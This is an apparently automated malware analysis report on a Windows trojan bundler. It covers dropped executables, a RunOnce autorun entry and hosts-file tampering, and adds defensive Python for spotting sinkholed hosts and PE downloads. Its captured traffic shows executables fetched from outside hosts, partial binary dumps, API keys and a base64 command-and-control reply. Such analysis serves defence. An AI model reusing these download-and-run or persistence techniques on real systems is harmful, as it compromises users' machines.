Application.Bundler.Temonde.HI_89f8002e3a

by malwarelabrobot on February 20th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Application.Bundler.Temonde.HI (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 89f8002e3a9f6505f6adbbbd7ad15f4b
SHA1: 5e225532d60fca398bf79abdcd2697bba8f467e3
SHA256: fd59bb065aed508fdf39bc95d87ae4ad08f2fec2f39e00b8d4fae7f144ab72be
SSDeep: 24576:NgZbjLjpVlqYonKAjJle1h5bGEDczAZSEx2G5AV3HDCWoX1R0j2ger7KDxWLZpES:NEzqJSvHpZSujyj9CwWsNKY4d
Size: 2177024 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-02-08 16:31:26
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

asasa.exe:888
nfarga3SormOmkom.exe:600
WeLoveYou.exe:3640
PRPCR3DZBB.exe:2192

The Application injects its code into the following process(es):

PRPCR3DZBB.exe:796
%original file name%.exe:1904

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process asasa.exe:888 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uninstaller.exe (35240 bytes)

The process nfarga3SormOmkom.exe:600 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (212 bytes)

The process PRPCR3DZBB.exe:796 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe (116842 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe.config.config (1 bytes)
C:\Windows\System32\drivers\etc\hosts (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe.config.config (1 bytes)

The process PRPCR3DZBB.exe:2192 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (174 bytes)

The process %original file name%.exe:1904 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe (11109 bytes)

Registry activity

The process asasa.exe:888 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\DMunversion]
"Version" = "6"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\asasa_RASAPI32]
"EnableFileTracing" = "0"

The process WeLoveYou.exe:3640 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\WeLoveYou_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

The process PRPCR3DZBB.exe:796 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\PRPCR3DZBB_RASMANCS]
"FileTracingMask" = "4294901760"

The Application adds a link to its dropped file to the RunOnce autorun key. Unlike the Run key, a RunOnce value is executed once at the next logon and then deleted, so this relaunches the dropper after a single reboot rather than keeping it resident on every boot:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_UC5GW" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process PRPCR3DZBB.exe:2192 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:1904 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "19/02/2017"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
"Product" = "diskpower"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\wewewe]
"channel" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\89f8002e3a9f6505f6adbbbd7ad15f4b_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

The Application deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
8460527fbae2c0553d95f367bd81c273 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\WeLoveYou.exe
664d50070c27336c31e8773c4183b502 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\asasa.exe
8d8274b5d9cbcbf313d28214d5f24341 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\87HQR3ZCB6\nfarga3SormOmkom.exe
522a6caaecc93e18862a9e0fd7296978 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\PRPCR3DZBB.exe
0ec36244b2448272be6a8974e6684a1d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\uninstaller.exe

HOSTS file anomalies

The Application modifies "%System%\drivers\etc\hosts", the static host-name-to-IP map that Windows consults before querying DNS. The modified file is 1386 bytes in size. The following entries are added (the same five-name block appears three times in the modified file). Mapping a name to 127.0.0.1 makes it unreachable: this silences validation.sls.microsoft.com, a Microsoft software-licensing validation endpoint, together with several domains whose names suggest an ad-panel and distribution backend:

127.0.0.1 validation.sls.microsoft.com
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 beautifllink.xyz
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 beautifllink.xyz
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 beautifllink.xyz
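An added check for this behaviour (example code, not part of the Lavasoft report): a parser that reads a hosts file, flags every non-local name that is pointed at a loopback or unspecified address, reports the line numbers (so duplicated blocks like the one above are visible), and rebuilds the file without them. The sample hosts content is constructed here from the Windows 7 default comment header plus the entries listed above, with two extra constructed lines (a 0.0.0.0 sinkhole and an ordinary LAN entry) to show what is and is not flagged.

```python
import ipaddress

# Constructed sample hosts file: the Windows 7 default comment header followed
# by the entries this sample appended (names copied from the report), the
# duplicated block included, plus two constructed lines to exercise the
# 0.0.0.0 case and an ordinary LAN entry that must not be flagged.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 127.0.0.1       localhost
# ::1             localhost
127.0.0.1 validation.sls.microsoft.com
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 beautifllink.xyz
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
0.0.0.0 update.example
192.168.1.10 fileserver
"""

# Names that legitimately point at loopback and must not be reported.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Return [(line_no, ip_address, [names])] for each mapping line.
    Comments ('#' to end of line) and blank or malformed lines are skipped,
    which is how the resolver treats them too."""
    entries = []
    for no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        entries.append((no, ip, [n.lower() for n in fields[1:]]))
    return entries


def find_sinkholed(text):
    """Map each non-local host name that is pointed at a loopback or
    unspecified address (127.0.0.1, ::1, 0.0.0.0) to the line numbers
    that do so. Duplicated entries show up as several line numbers."""
    hits = {}
    for no, ip, names in parse_hosts(text):
        if not (ip.is_loopback or ip.is_unspecified):
            continue
        for name in names:
            if name not in LOCAL_NAMES:
                hits.setdefault(name, []).append(no)
    return hits


def clean_hosts(text):
    """Rebuild the file without the sinkhole lines; everything else,
    comments included, is kept verbatim."""
    drop = {no for nos in find_sinkholed(text).values() for no in nos}
    kept = [line for no, line in enumerate(text.splitlines(), 1) if no not in drop]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for name, lines in sorted(find_sinkholed(SAMPLE_HOSTS).items()):
        print(f"{name}: sinkholed on line(s) {lines}")
```

When running this against a live machine, read the directory from the DataBasePath value under HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters rather than hard-coding %System%\drivers\etc, since the resolver honours that value and the file can be relocated through it.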


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: H
Product Name: HOYB9YYFM
Product Version: 3.1.2.5
Legal Copyright: Copyright (c) 7346
Legal Trademarks:
Original Filename: Yu55AAAa.exe
Internal Name: Yu55AAAa.exe
File Version: 3.1.2.5
File Description: HO
Comments: HOYB
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 2170280 2170368 4.16807 d192347b6f1479ebfea39dddf3a71d51
.rsrc 2179072 5128 5632 3.48057 27b93c8ccf91b91adfaf1683ffe3d7ec
.reloc 2187264 12 512 0.070639 a77cf5d3a5e442962d2fdd5b8214901b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://weminternal.com/download/4/replaceUninstaller.exe 94.23.252.37
hxxp://weminternal.com/download/4/nfarga3SormOmkom.exe 94.23.252.37
hxxp://weminternal.com/get/4/updater.exe 94.23.252.37
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load 94.23.44.92
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok 94.23.44.92
hxxp://weminternal.com/get/4/diskpower-uninstaller.exe 94.23.252.37
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load 94.23.44.92
hxxp://weminternal.com/get/4/remote.exe 94.23.252.37
hxxp://asiasoftwaretools.com/get/4/updater.exe 94.23.252.37
hxxp://asiasoftwaretools.com/download/4/replaceUninstaller.exe 94.23.252.37
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 94.23.44.92
hxxp://asiasoftwaretools.com/get/4/diskpower-uninstaller.exe 94.23.252.37
hxxp://asiasoftwaretools.com/download/4/nfarga3SormOmkom.exe 94.23.252.37
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok 94.23.44.92


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
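The ET POLICY alert above fires on the generic shape of these transfers: an HTTP response whose body is a PE image. As an added illustration (example code, not part of the report), the following Python reproduces that check on a captured response. Note that the dumps below begin each body with a hexadecimal chunk size ("13800", "2e00", "215800", "b7800") because the server uses Transfer-Encoding: chunked; the MZ header only follows the chunk-size line. The sample response is constructed from the remote.exe headers in the capture, with a minimal synthetic PE stub standing in for the real file.

```python
import re


def _build_pe_stub():
    """Constructed: the smallest byte sequence carrying the three marks the
    check looks for (MZ magic, DOS-stub string, PE signature at e_lfanew).
    This is not the real remote.exe."""
    dos_header = b"MZ" + b"\x00" * 58 + (0x80).to_bytes(4, "little")  # e_lfanew = 0x80
    stub = b"This program cannot be run in DOS mode.\r\n$".ljust(64, b"\x00")
    pe = b"PE\x00\x00" + b"\x4c\x01"  # signature + IMAGE_FILE_MACHINE_I386
    return dos_header + stub + pe


# Constructed from the GET /get/4/remote.exe response headers in the capture.
# The first chunk announces 0x13800 bytes; only the beginning is "captured".
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sun, 19 Feb 2017 01:22:17 GMT\r\n"
    b"Server: Apache/2.4.10 (Debian)\r\n"
    b"Cache-Control: no-cache\r\n"
    b'content-disposition: attachment; filename="remote.exe"\r\n'
    b"Keep-Alive: timeout=10, max=100\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: application/x-msdownload\r\n"
    b"\r\n"
    b"13800\r\n" + _build_pe_stub()
)


def split_response(raw):
    """Split a raw HTTP response into (status line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def first_chunk(body, headers):
    """Return (announced_size, data) of the first chunk when the transfer is
    chunked; otherwise (None, body). Works on a truncated capture, so the
    returned data may be shorter than the announced size."""
    if "chunked" not in headers.get("transfer-encoding", "").lower():
        return None, body
    size_line, _, rest = body.partition(b"\r\n")
    size = int(size_line.split(b";")[0].strip(), 16)  # chunk extensions ignored
    return size, rest[:size]


def looks_like_pe(data):
    """MZ magic plus a PE signature at the offset stored in e_lfanew (0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(raw):
    status, headers, body = split_response(raw)
    size, data = first_chunk(body, headers)
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    return {
        "status": status,
        "filename": m.group(1) if m else None,
        "content_type": headers.get("content-type"),
        "chunk_size": size,
        "captured": len(data),
        "is_pe": looks_like_pe(data),
        "dos_stub": b"This program cannot be run in DOS mode" in data,
    }


if __name__ == "__main__":
    print(classify(SAMPLE_RESPONSE))
```

The content-type and content-disposition headers are attacker-controlled and are reported only as context; the verdict rests on the body bytes, which is also what the ET signature keys on.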

Traffic

POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



api_key=fa02609b-2368-11e6-922f-0cc47a47968c


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:28 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=0b4b5gra7ensu10df2618co4t0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....



POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....



api_key=fa02609b-2368-11e6-922f-0cc47a47968c


HTTP/1.1 200 OK

Date: Sun, 19 Feb 2017 01:22:28 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=42cd7b7j4c8a2kntt6q1ln4sb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


GET /get/4/remote.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 01:22:17 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
13800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
......X.........."...0......P......R.... ... ....@.. .................
...................@.....................................O.... ..0M...
......................................................................
.. ............... ..H............text...X.... ......................
..`.rsrc...0M... ...N..................@..@.reloc...............6.....
.........@..B................4.......H.......8#...............9.......
.......................................6.(.....(....*z.,..{....,..{...
.o......(....*z.s....}......(.....r...po....*.0..........r...p.r...p.(
....&.(....*....0..8.......s...... ....}.....r=..p}...........s....s..
..(......&..*.........4........(....*.~....-.r_..p.....( ...o!...s"...
.....~....*.~....*.......*.~....*..(#...*Vs....($...t.........*..-.r..
.ps%...z.(&...o'...%-.r...ps%...z.......%...o(...&*...0...........()..
...(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o1.....s2...
....s3.....i.:.....%......io4......o5...o5...(6........o7...r...p(8...
o9...*..0..P.......(:....o;.....s<...%o=.....o5...o>......=...%.
.....o?................(....()...*.0..........r...p(.......(......&..
*.................0..9......... ..X...{......>...(@....{.....>.
..(@...}......{....2.*...BSJB............v2.0.50727......l.......#~...
.......#Strings....0.......#US.$.......#GUID...4...|...#Blob..........
.WU.........3........>...................@.....................

<<< skipped >>>

GET /download/4/replaceUninstaller.exe HTTP/1.1
Host: asiasoftwaretools.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 01:22:25 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="replaceUninstaller.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.."1.X.........."...0..............6... ...@....@.. ..................
..................@.................................p6..O....@........
...............`......85..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`.......,......
........@..B.................6......H........"...............4........
.......................................0..~.........(....o.....~.....(
......~....(....,..*...............(....(....}.......(....-..*.j.{....
n3..{......-....(....-...1..(....*.*..(....*.......*...0............~.
...r...po......,$.r?..po....t#...rO..p(....,....o.....9....(....o ...o
!...("...rS..p(#.....($...,..(%......ru..p(....,.r{..ps&....(....& B..
.r...p(....,.r...ps&....(....& ...r...p(....,.r...ps&....(....&.($...
,.~....r...po'...r?..prO..po(.....&..*.................0..........s)..
...o*.....&.....*.*..................~....-.r...p.....(....o ...s,....
....~....*.~....*.......*.~....*..(-...*Vs....(....t.........*:.(.....
.}....*..0..........s).....{....o*.....&.....*.*................BSJB..
..........v2.0.50727......l.......#~..........#Strings........L...#US.
,.......#GUID...<...d...#Blob...........W5.........3........)......
......................................................................
.........[.....[...M.............u.....u.....u...m.u...9.u...R.u..

<<< skipped >>>

GET /download/4/nfarga3SormOmkom.exe HTTP/1.1

Host: asiasoftwaretools.com


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 01:22:25 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="nfarga3SormOmkom.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
3000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
../..X.........."...0..............8... ...@....@.. ..................
..................@..................................8..O....@........
...............`......d7..............................................
. ............... ..H............text........ ...................... .
.`.rsrc........@......................@..@.reloc.......`..............
........@..B.................8......H........#...............6........
.......................................0..-.......(....(......(....(..
...#(....(....(......&..*...........)).......0..@........,;r...ps....r
...ps.....r...ps......o....-...o....-...o....*.*.*Z.,.r...ps.....o....
*.*Z.,.r...ps.....o....*.*...0..I........(....... 2.....s....o....(...
.,..(.....(......(......&....X....i2...&..*.........-..6..........EE..
.....0..6........... )......(....-...(......&....(......&....X....i2.*
.................... ..(.......0.............$...%..\.o....%.i.Y...$..
.%....o......... ......,..r...p(.......(.......X....i.Y2..( ........ .
.....o!... ....("......X.......i2.*....0...........%(....r...p(#......
"...%.r ..p.%.($....%.rZ..p.%.($....%.r...p.%.($....%.r...p.%.($....%.
r<..p.%..($....(%...(&...~'...rr..po(...-.~'...rr..po)...&..&..*...
.................(*...*.~....-.r...p.....( ...o,...s-........~....*.~.
...*.......*.~....*..(....*Vs....(/...t.........*BSJB............v2.0.
50727......l.......#~..4...h...#Strings............#US.........#GU

<<< skipped >>>

GET /get/4/updater.exe HTTP/1.1

Host: asiasoftwaretools.com


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 01:22:25 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
215800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......X.........."...0...!..P......R$!.. ...@!...@.. ................
........!...........@..................................$!.O....@!.0M..
..................!......"!...........................................
... ............... ..H............text...X.!.. ....!.................
..`.rsrc...0M...@!..N....!.............@..@.reloc........!......V!...
..........@..B................4$!.....H.......8#...............9.... .
........................................6.(.....(....*z.,..{....,..{..
..o......(....*z.s....}......(.....r...po....*.0..........r...p.r...p.
(....&.(....*....0..8.......s...... ....}.....r=..p}...........s....s.
...(......&..*.........4........(....*.~....-.r_..p.....( ...o!...s"..
......~....*.~....*.......*.~....*..(#...*Vs....($...t.........*..-.r.
..ps%...z.(&...o'...%-.r...ps%...z.......%...o(...&*...0...........().
....(*....o ...s,.... o-....s....%.o/...%.o0....(*....o ...o1.....s2..
.....s3.....i.:.....%......io4......o5...o5...(6........o7...r...p(8..
.o9...*..0..P.......(:....o;.....s<...%o=.....o5...o>......=...%
. .....o?................(....()...*.0..........r...p(.......(......&.
.*.................0..9......... ..X...{......>...(@....{.....>
...(@...}......{....2.*...BSJB............v2.0.50727......l.......#~..
........#Strings....0.......#US.$.......#GUID...4...|...#Blob.........
..WU.........3........>...................@....................

<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive

remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_channel_name=1
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 01:22:22 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=3usmpa2vo72pfbtmu7hr1vaar4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1644
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s+DQoNCjxwZXJmb3JtPg0KDQo8ZG9
3bmxvYWQgbmFtZT0iYXNhc2EiIHZhbHVlPSJodHRwOi8vYXNpYXNvZnR3YXJldG9vbHMuY
29tL2Rvd25sb2FkLzQvcmVwbGFjZVVuaW5zdGFsbGVyLmV4ZSAiIHZlcnNpb249IiIgIHN
vZnR3YXJlPSIiIG5ldD0ieWVzIi8+DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iY
XNhc2EiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9IndlIi8+DQo8bW9kIHR5cGU9ImFkZCI
gbmFtZT0iYXNhc2EiIHZhbHVlPSJlZWV6NTg1OCIvPg0KDQo8L3BlcmZvcm0+DQoNCjxjb
25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJhc2FzYSIgdmFsdWU9ImV
lZXo1ODU4IiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KDQo8L3Rhc2s+P
HRhc2s+IDxwZXJmb3JtPiA8ZG93bmxvYWQgbmFtZT0ibmZhcmdhM1Nvcm1PbWtvbSIgdmF
